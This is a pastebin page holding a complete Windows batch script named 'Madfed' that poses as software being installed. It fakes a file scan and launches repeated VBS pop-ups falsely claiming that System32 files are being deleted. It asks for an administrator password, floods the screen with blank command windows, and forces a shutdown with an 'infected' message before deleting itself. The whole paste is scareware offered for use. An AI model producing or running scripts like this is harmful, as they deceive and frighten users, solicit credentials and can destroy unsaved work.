Guest User


a guest
Apr 25th, 2017
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text 1.67 KB | None | 0 0
  1. @echo off
  2. title Madfed
  3. color 0a
  4. setlocal enabledelayedexpansion
  5. set Counter=0
  6. set Schalter=2
  7. set Width=0
  9. :1
  10. set /a Counter=%Counter% + 1
  11. set /a Display=%Counter% / 2
  12. FOR /L %%A IN (1,1,%Display%) DO (
  13. set Display=!Display!²
  14. )
  15. cls
  16. echo Entering Madfed . . . %Counter%%%
  17. echo ²!Display:~2,47!
  18. ping localhost -n 1 >nul
  19. if "%Counter%" == "100" goto :1-End
  20. goto :1
  21. :1-End
  22. echo.
  23. echo Welcome to Madfed, %USERNAME%.
  24. pause
  25. cls
  26. @echo off
  27. color 0a
  28. echo Thank you for installing Madfed. I'm sure you're wondering what this software does. So am I.
  29. pause
  30. cls
  31. @echo off
  32. color 0a
  33. echo Let's see what we can do, shall we?
  34. timeout /t 3 /nobreak >nul
  35. dir /s
  36. dir /s
  37. dir /s
  38. dir /s
  39. dir /s
  40. dir /s
  41. dir /s
  42. dir /s
  43. cls
  44. @echo off
  45. color 0a
  46. echo I just scanned all your files. They look delicious.
  47. pause
  48. cls
  49. @echo off
  50. color 0a
  51. echo Say goodbye to your files, %USERNAME%.
  52. timeout /t 3 /nobreak >nul
  53. echo x=msgbox("Deleting System32 Files . . .",o+o,"System Deletion") > trojan.vbs
  54. start trojan.vbs
  55. start trojan.vbs
  56. start trojan.vbs
  57. start trojan.vbs
  58. start trojan.vbs
  59. start trojan.vbs
  60. start trojan.vbs
  61. start trojan.vbs
  62. start trojan.vbs
  63. start trojan.vbs
  64. start trojan.vbs
  65. start trojan.vbs
  66. start trojan.vbs
  67. start trojan.vbs
  68. echo InputBox("Enter an Administrator password.") > worm.vbs
  69. start worm.vbs
  70. start
  71. start
  72. start
  73. start
  74. start
  75. start
  76. start
  77. start
  78. start
  79. start
  80. start
  81. start
  82. start
  83. start
  84. start
  85. start
  86. start
  87. start
  88. start
  89. start
  90. start
  91. start
  92. start
  93. start
  94. start
  95. start
  96. start
  97. start
  98. start
  99. start
  100. start
  101. start
  102. start
  103. start
  104. start
  105. start
  106. shutdown -s -t 30 -c "Your PC has been infected with Madfed. :("
  107. del madfed.bat
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